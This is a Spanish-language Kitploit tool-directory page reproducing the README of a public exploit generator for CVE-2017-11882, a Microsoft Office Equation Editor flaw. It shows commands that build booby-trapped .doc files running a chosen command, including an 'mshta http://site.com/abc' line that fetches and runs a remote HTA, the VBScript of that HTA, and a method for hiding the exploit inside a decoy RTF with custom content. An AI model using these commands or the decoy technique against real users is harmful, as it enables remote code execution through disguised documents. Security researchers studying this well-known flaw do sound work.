Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-11882 — CVE-2017-11882 de https://github.com/embedi/CVE-2017-11882 | Kitploit
Herramientas/GitHubGitHub/ridter/cve-2017-11882
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubridter/cve-2017-11882

CVE-2017-11882

CVE-2017-11882 de https://github.com/embedi/CVE-2017-11882

Ver Repositorio
535242hace 8 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2017-11882

43b El script original proviene de https://github.com/embedi/CVE-2017-11882

109b El script original proviene de https://github.com/unamer/CVE-2017-11882/ (mis respetos, ahora el código de unamer ya puede ejecutar shellcode~)

CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/

MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

Uso

root@kitploit:~
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

usar mshta

root@kitploit:~
python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc

abc

root@kitploit:~
<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD> 
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD> 
</HTML> 

La longitud del comando 43b no puede exceder los 43 bytes, y la longitud del comando 109b no puede exceder los 109 bytes

Exploit de muestra para CVE-2017-11882 (iniciando calc.exe como payload)

La carpeta example contiene un archivo .rtf que explota la vulnerabilidad CVE-2017-11882 y ejecuta la calculadora en el sistema.

Acerca del contenido personalizado

En realidad, la técnica para el contenido personalizado la aprendí de otros maestros. Ya la había convertido en un script hace mucho tiempo y no pensaba hacerla pública, pero al ver que alguien del grupo ya la había publicado, no tuve más remedio que hacerla pública también. En realidad el método es muy sencillo: solo hay que abrir el documento rtf normal con un editor de texto, copiar todo el contenido anterior a {*\datastore y reemplazar el contenido anterior a {\object\objautlink\objupdate. Por eso es muy fácil escribirlo en un script.

Para agregar contenido personalizado, elija cualquiera de los scripts:

root@kitploit:~
python Command109b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc -i input.rtf

El contenido personalizado se coloca en input.rtf.

En cuanto al último script de explotación de 605 bytes de unamer, no lo actualizaré; si te interesa, modifícalo tú mismo.

Descargar herramienta